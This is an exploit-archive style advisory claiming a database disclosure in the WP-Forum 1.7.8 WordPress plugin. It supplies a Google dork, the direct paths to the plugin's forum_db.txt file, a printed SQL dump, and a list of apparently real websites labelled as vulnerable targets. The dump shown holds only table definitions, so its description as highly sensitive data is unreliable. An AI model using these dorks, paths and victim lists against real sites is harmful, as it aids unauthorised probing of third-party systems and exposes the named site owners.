########################################################################### # Exploit Title : WordPress 2.0.2 WP-Forum Plugins 1.7.8 Database Disclosure # Author [ Discovered By ] : KingSkrupellos # Team : Cyberizm Digital Security Army # Date : 27/03/2019 # Vendor Homepage : wordpress.org # Software Information Link : github.com/motdotla/annmotte.com/blob/master/wp-content/plugins/wp-forum/forum_db.txt wordpress.org/plugins/tags/wp-forum/ # Software Affected Version : WordPress 2.0.2 and 2.1 / Plugin Version 1.7.8 # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : High # Google Dorks : forum_db.txt inurl:/wp-content/plugins/wp-forum/ # Vulnerability Type : CWE-200 [ Information Exposure ] CWE-538 [ File and Directory Information Exposure ] # PacketStormSecurity : packetstormsecurity.com/files/authors/13968 # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/ # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos # Acunetix Information Link about phpMyAdmin SQL dump File => acunetix.com/vulnerabilities/web/phpmyadmin-sql-dump/ ########################################################################### # Information About Software : **************************** Simple discussion forum plugin for WordPress. With support for different skins, 3 included by default, changeable from the WP admin interface. Admin can choose if unregistered posting is allowed and Captcha (optional) is used for spam control. Tight interaction with Wordpress makes an easy to use and administer plugin. # Installation : ************* 1. Rename wpforum to wp-forum and copy it to to wp-content/plugins 1. Go and activate the plugin 1. Create a page from the Manage tab 1. Click on the HTML button in Wordpress and then insert: `<!--WPFORUM-->` 1. Go to manage->wp-forum and start adding groups and forums. 1. You must then visit the WP-Forum options panel in WP admin. 1. Setup a link to your forum (unless you have your pages auto-linking in the navigation menu) 1. To show the latest acitvity in the sidebar add this code: `<?php forum_latest_acivity(numbers_to_show);?>` where numbers_to_show is an actual number like 1,2,3 1. If you upload a new version go to plugin managment and deactivate and the activate WP-Forum. Visit the structure page of the wp-forum management. ########################################################################### # Impact : *********** * An information exposure is the intentional or unintentional disclosure of information to an actor that is not explicitly authorized to have access to that information. * The product stores sensitive information in files or directories that are accessible to actors outside of the intended control sphere. * phpMyAdmin is a free software tool written in PHP, intended to handle the administration of MySQL over the World Wide Web. It can be used to dump a database or a collection of databases for backup or transfer to another SQL server (not necessarily a MySQL server). The dump typically contains SQL statements to create the table, populate it, or both. This file contains an phpMyAdmin SQL dump. This information is highly sensitive and should not be found on a production system. Remediation : Restrict access to this file or remove it from the system. ########################################################################### # Database Disclosure Exploit : *************************** /wp-content/plugins/wp-forum/forum_db.txt /wp-content/plugins/wp-form/wpforum/forum_db.txt # Information : ************** -- phpMyAdmin SQL Dump -- version 2.7.0-pl2 -- phpmyadmin.net -- -- Host: localhost -- Server version: 5.0.19 -- PHP Version: 5.1.4 -- -- Database: `wordpress` -- -- -------------------------------------------------------- -- -- Table structure for table `wp_forum_forums` -- CREATE TABLE `wp_forum_forums` ( `id` int(11) NOT NULL auto_increment, `name` varchar(255) NOT NULL default '', `parent_id` int(11) NOT NULL default '0', `description` varchar(255) NOT NULL default '', `views` int(11) NOT NULL, PRIMARY KEY (`id`) ) ; -- -------------------------------------------------------- -- -- Table structure for table `wp_forum_groups` -- CREATE TABLE `wp_forum_groups` ( `id` int(11) NOT NULL auto_increment, `name` varchar(255) NOT NULL default '', PRIMARY KEY (`id`) ) ; -- -------------------------------------------------------- -- -- Table structure for table `wp_forum_posts` -- CREATE TABLE `wp_forum_posts` ( `id` int(11) NOT NULL auto_increment, `author_name` varchar(255) default NULL, `author_email` varchar(255) default NULL, `author_web` varchar(255) default NULL, `text` longtext, `thread_id` int(11) NOT NULL default '0', `date` datetime NOT NULL default '0000-00-00 00:00:00', `author_id` int(11) NOT NULL, `subject` varchar(255) NOT NULL, `views` int(11) NOT NULL, PRIMARY KEY (`id`) ) ; -- -------------------------------------------------------- -- -- Table structure for table `wp_forum_threads` -- CREATE TABLE `wp_forum_threads` ( `id` int(11) NOT NULL auto_increment, `forum_id` int(11) NOT NULL default '0', `views` int(11) NOT NULL default '0', `subject` varchar(255) NOT NULL default '', `date` datetime NOT NULL default '0000-00-00 00:00:00', PRIMARY KEY (`id`) ) ; ########################################################################### # Example Vulnerable Sites : ************************* [+] centres-animation-quartiers-bordeaux.eu/wp-content/plugins/wp-forum/forum_db.txt [+] thebrashbrothers.com/wp-content/plugins/wpforum/forum_db.txt [+] dgerard.com/news.41clubs.be/wp-content/plugins/wp-forum/forum_db.txt [+] ridceo.rid.go.th/udornth/xxnongkungthanasan/wp-content/plugins/wp-form/wpforum/forum_db.txt [+] templebaptistchurchonline.com/wordpress/wp-content/plugins/wp-forum/forum_db.txt [+] templebaptist.church/wordpress/wp-content/plugins/wp-forum/forum_db.txt ########################################################################### # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team ###########################################################################